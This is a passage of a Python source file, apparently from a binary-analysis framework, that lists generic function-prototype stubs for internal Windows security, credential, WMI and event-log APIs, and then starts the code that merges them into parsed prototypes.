"EventWriteStartScenario": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction014": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AddUsersToEncryptedFileEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfRegisterEventSourceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredEncryptAndMarshalBinaryBlob": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiPopulateDefaultsInRegistry": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiSearchMatchingHashRules": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetSystemAccessAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReadEventLogW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiExecuteMethodA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleInstanceA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaLookupPrivilegeValue": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleItemW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryAllDataA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredBackupCredentials": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertStringSDToSDRootDomainW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaCreateTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetAccessPermissionsForObjectW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReportEventW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction015": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfCloseEventLog": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UsePinForEncryptedFilesW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaManageSidNameMapping": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredProfileUnloaded": SimTypeFunction([], SimTypeLong(signed=True)),
"SystemFunction007": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleItemA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNamedSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiFileHandleToInstanceNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiChangeRegistryScope": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD5Init": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScPnPGetServiceName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpConvertTargetInfo": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsValidRelativeSecurityDescriptor": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpDecodeCredential": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScSetServiceBitsW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterIdleTask": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction017": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction033": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CancelOverlappedAccess": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"TrusteeAccessToObjectW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EventWriteEndScenario": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ComputeAccessTokenFromCodeAuthzLevel": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetQuotasForAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScIsSecurityProcess": SimTypeFunction([], SimTypeLong(signed=True)),
"SetNamedSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction019": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryAllDataMultipleW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfDeregisterEventSource": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfClearEventLogFileA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertAccessToSecurityDescriptorA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction016": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiMofEnumerateResourcesW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiNotificationRegistrationA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaAddPrivilegesToAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction003": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction020": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction006": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertStringSDToSDRootDomainA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertStringSDToSDDomainW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessNamedA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaRemovePrivilegesFromAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ProcessIdleTasks": SimTypeFunction([], SimTypeLong(signed=True)),
"ConvertStringSDToSDDomainA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAuditListA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NotifyServiceStatusChange": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaQuerySecurityObject": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfBackupEventLogFileA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction018": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiIsDllAllowed": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiCloseBlock": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction035": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiSetSingleInstanceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpEncodeCredential": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryAllDataMultipleA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction030": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction005": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction012": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction031": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAuditListW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScGetCurrentGroupStateW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetNamedSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfNumberOfRecords": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaClearAuditLog": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CreateCodeAuthzLevel": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD5Update": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfFlushEventLog": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MakeAbsoluteSD2": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiCompareTokenLevels": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAccessListA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction008": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"FlushEfsCache": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessNamedW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaCreateAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaEnumerateAccounts": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryGuidInformation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_QueryTagInformation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetInformationCodeAuthzLevelW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaQueryInfoTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction028": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceMultipleW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiReceiveNotificationsW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetInformationTrustedDomain": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScValidatePnPService": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReportEventAndSourceW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSDToStringSDRootDomainA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"TrusteeAccessToObjectA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD4Init": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetOverlappedAccessResults": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LogonUserExExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaLookupPrivilegeName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredRestoreCredentials": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScSendTSMessage": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaLookupPrivilegeDisplayName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScSendPnPMessage": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupSids": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction034": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiRecordEventLogEntry": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction026": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenBackupEventLogA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction029": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReadEventLogA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpConvertCredential": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupSidsWithCreds": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction001": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UsePinForEncryptedFilesA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaQuerySecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaEnumeratePrivileges": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction032": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetInformationCodeAuthzPolicyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpEncodeSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenBackupEventLogW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IdentifyCodeAuthzLevelW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction009": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"A_SHAUpdate": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaDelete": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfClearEventLogFileW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetInformationCodeAuthzPolicyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"I_ScQueryServiceConfig": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiDevInstToInstanceNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction022": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQueryAllDataW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOldestRecord": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction002": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAccessListW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetQuotasForAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredReadByTokenHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction004": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupNamesWithCreds": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction023": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction011": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiNotificationRegistrationW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction021": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiReceiveNotificationsA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD5Final": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
}
for lib, decls in missing_declarations.items():
for func, proto in decls.items():
parsed_cprotos[lib].append((func, proto, ""))
# Write to files
header = """# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, \
